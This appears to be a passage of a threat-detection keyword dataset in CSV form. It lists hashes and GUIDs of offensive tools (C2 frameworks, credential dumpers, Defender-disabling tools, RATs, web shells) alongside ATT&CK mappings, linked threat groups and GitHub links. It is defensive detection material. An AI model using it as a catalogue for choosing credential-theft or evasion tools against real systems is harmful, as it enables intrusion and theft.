"*c0dca4eb22f84060319a2718d3987460ad74a50ce76dfeddee62aef685fd35c2*",".{0,1000}c0dca4eb22f84060319a2718d3987460ad74a50ce76dfeddee62aef685fd35c2.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","36693" "*c0dn/truesocks_rs*",".{0,1000}c0dn\/truesocks_rs.{0,1000}","offensive_tool_keyword","TrueSocks","Simple API for buying renting and managing proxies","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","Defense Evasion","https://github.com/c0dn/truesocks_rs","1","1","N/A","N/A","10","1","0","0","2023-05-09T01:00:05Z","2023-04-06T02:32:04Z","36694" "*c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f*",".{0,1000}c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","36695" "*c0e4afb28f57864b83eb7ae3d5e63a4202decb862fbc5b17a92a51cbd1c469ca*",".{0,1000}c0e4afb28f57864b83eb7ae3d5e63a4202decb862fbc5b17a92a51cbd1c469ca.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","36696" 
"*c0e65b802e813fd274aaba62a4b321210d7e55f27c7ee65516d046f9867d734e*",".{0,1000}c0e65b802e813fd274aaba62a4b321210d7e55f27c7ee65516d046f9867d734e.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","36697" "*C0E67E76-1C78-4152-9F79-FA27B4F7CCCA*",".{0,1000}C0E67E76\-1C78\-4152\-9F79\-FA27B4F7CCCA.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","#GUIDproject","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","36698" "*c0e6f80a5ecf346f09432ec1dab7a23f6418f6af022020420330a463eebfabe9*",".{0,1000}c0e6f80a5ecf346f09432ec1dab7a23f6418f6af022020420330a463eebfabe9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36699" "*c0ec4fdda78c68d5b982664a121efb8939808171d11d7a1e9bc17db565d99ee1*",".{0,1000}c0ec4fdda78c68d5b982664a121efb8939808171d11d7a1e9bc17db565d99ee1.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/Mayyhem/Maestro","1","0","#filehash","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","36700" "*c0fdcce36afa206ce080c1b8602ecf18fdc23a207078cb437594d7f674b2a693*",".{0,1000}c0fdcce36afa206ce080c1b8602ecf18fdc23a207078cb437594d7f674b2a693.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","36705" "*C10599E3-5A79-484F-940B-E4B61F256466*",".{0,1000}C10599E3\-5A79\-484F\-940B\-E4B61F256466.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","36708" "*c106a84af24143cbac3f066419316fbf2b0b748420381d304157c0a645788338*",".{0,1000}c106a84af24143cbac3f066419316fbf2b0b748420381d304157c0a645788338.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36709" "*c1090dbc-f2f7-4d90-a241-86e0c0217786*",".{0,1000}c1090dbc\-f2f7\-4d90\-a241\-86e0c0217786.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","#GUIDproject","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","36710" "*c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6*",".{0,1000}c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36711" "*c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712*",".{0,1000}c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36712" "*c121f7d62fa5ecd27c3aaae5737a3de8f2e4def0c182058b6dd824aa92351e9c*",".{0,1000}c121f7d62fa5ecd27c3aaae5737a3de8f2e4def0c182058b6dd824aa92351e9c.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","0","#filehash","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","36715" "*c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade*",".{0,1000}c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","#filehash","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","36716" 
"*c12cad06d0e93742fd0ce0c698c654ff3c86b567dcc4102cd2c5d931d77dcc64*",".{0,1000}c12cad06d0e93742fd0ce0c698c654ff3c86b567dcc4102cd2c5d931d77dcc64.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","36717" "*c13a0cd7c2c2fd577703bff026b72ed81b51266afa047328c8ff1c4a4d965c97*",".{0,1000}c13a0cd7c2c2fd577703bff026b72ed81b51266afa047328c8ff1c4a4d965c97.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 
- TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","36720" "*C13C80ED-ED7A-4F27-93B1-DE6FD30A7B43*",".{0,1000}C13C80ED\-ED7A\-4F27\-93B1\-DE6FD30A7B43.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#GUIDproject","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","36721" "*c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094*",".{0,1000}c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","36722" "*c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0*",".{0,1000}c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36724" "*c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf*",".{0,1000}c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36726" "*c14cdcc5244fa9bb63ef50f28b2699c3cac0d42bd983ddb823a635842d0b143a*",".{0,1000}c14cdcc5244fa9bb63ef50f28b2699c3cac0d42bd983ddb823a635842d0b143a.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","36728" "*c15919a683d0e4d1d71792876be6f9a7a03651e60a6a1db3ce1b8573251301aa*",".{0,1000}c15919a683d0e4d1d71792876be6f9a7a03651e60a6a1db3ce1b8573251301aa.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36730" "*c159cb0a6a05145cbad83d2a4f12781520546f672dccf27361d40b3cf9c59ee1*",".{0,1000}c159cb0a6a05145cbad83d2a4f12781520546f672dccf27361d40b3cf9c59ee1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36731" "*c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0*",".{0,1000}c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36732" "*c17076b7aa8e89e2b403234e0873f24e0c784a783ad30fc190091f792dd2d3dc*",".{0,1000}c17076b7aa8e89e2b403234e0873f24e0c784a783ad30fc190091f792dd2d3dc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36734" "*c180bfdab317b545e167896e4a622cb9f9bfb0f1e8e44ed58e1f958dde94d1ed*",".{0,1000}c180bfdab317b545e167896e4a622cb9f9bfb0f1e8e44ed58e1f958dde94d1ed.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36737" 
"*c18989d8b80f11117c403bc1c8f8afac0a807f1acdf67ecffcf50402164c11eb*",".{0,1000}c18989d8b80f11117c403bc1c8f8afac0a807f1acdf67ecffcf50402164c11eb.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","36739" "*c18c8abdaeacc30c7bdc46cf7565e5255aae8df8f34b7964ff09d35736d2816c*",".{0,1000}c18c8abdaeacc30c7bdc46cf7565e5255aae8df8f34b7964ff09d35736d2816c.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","#filehash","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","36740" "*c18d399ff853bce9a6a0bccdd5ba741639556d61694317a5e8d33282ca2b5c88*",".{0,1000}c18d399ff853bce9a6a0bccdd5ba741639556d61694317a5e8d33282ca2b5c88.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36741" "*c19100c9fbebb503b21a36ca64471807cf3d25b7f0efb14d579ed291d3bae78e*",".{0,1000}c19100c9fbebb503b21a36ca64471807cf3d25b7f0efb14d579ed291d3bae78e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36743" "*c1a30c8a226a6099fa0fc3d39e1fe4e83763ad52c41675b607ab569b7957f8a7*",".{0,1000}c1a30c8a226a6099fa0fc3d39e1fe4e83763ad52c41675b607ab569b7957f8a7.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","36744" "*c1ae1df5425338331c97fc3c3892b01aeaa7d0562369d66d6178a33e6d1f00a0*",".{0,1000}c1ae1df5425338331c97fc3c3892b01aeaa7d0562369d66d6178a33e6d1f00a0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","36746" "*c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf*",".{0,1000}c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36748" "*c1c15496ae180633f6464c67cf86603d64b662d674a18f8c9e9f19c71d74acc1*",".{0,1000}c1c15496ae180633f6464c67cf86603d64b662d674a18f8c9e9f19c71d74acc1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36751" "*c1c9047d94569bf28c91247cfa84cb49c5d49e37eaae46804663a6d1f45b615d*",".{0,1000}c1c9047d94569bf28c91247cfa84cb49c5d49e37eaae46804663a6d1f45b615d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","36752" "*c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1*",".{0,1000}c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36753" "*c1cc14efcd2df072977c1371065807c3d2e4c6a576db89230b5c19e0ef00040d*",".{0,1000}c1cc14efcd2df072977c1371065807c3d2e4c6a576db89230b5c19e0ef00040d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","36754" "*c1ce14f634f6ed7a60ac4e69d35eb745c2238408ec5c6faacde3489b04f64e7d*",".{0,1000}c1ce14f634f6ed7a60ac4e69d35eb745c2238408ec5c6faacde3489b04f64e7d.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","36755" "*C1E1BD733564A70F30B59BC7B8067BF47512D70D71C15B18F49B5BEC2891CB44*",".{0,1000}C1E1BD733564A70F30B59BC7B8067BF47512D70D71C15B18F49B5BEC2891CB44.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","36756" "*c1e4c31f5944d6f9b5d8e08f09733807360052c69df4c34bf09f31e960f02b04*",".{0,1000}c1e4c31f5944d6f9b5d8e08f09733807360052c69df4c34bf09f31e960f02b04.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36757" "*c1f26f34840d12e1daeb6ee4362ae1582b564e0c1b6c6762f943dc521c694b69*",".{0,1000}c1f26f34840d12e1daeb6ee4362ae1582b564e0c1b6c6762f943dc521c694b69.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","36760" 
"*c1f50e0f88bd6dbb961180b7c9845ba431112e894c22554a581364e326ddc94c*",".{0,1000}c1f50e0f88bd6dbb961180b7c9845ba431112e894c22554a581364e326ddc94c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36761" "*c1f6cbbbf283dd122b10ec6bfbda0799703bea9465efc5673e71f7fd6951be09*",".{0,1000}c1f6cbbbf283dd122b10ec6bfbda0799703bea9465efc5673e71f7fd6951be09.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36762" "*c1f971aa959ea7722c8bc41a6677ad83230e129d69424c16835c3d000756582e*",".{0,1000}c1f971aa959ea7722c8bc41a6677ad83230e129d69424c16835c3d000756582e.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","36763" 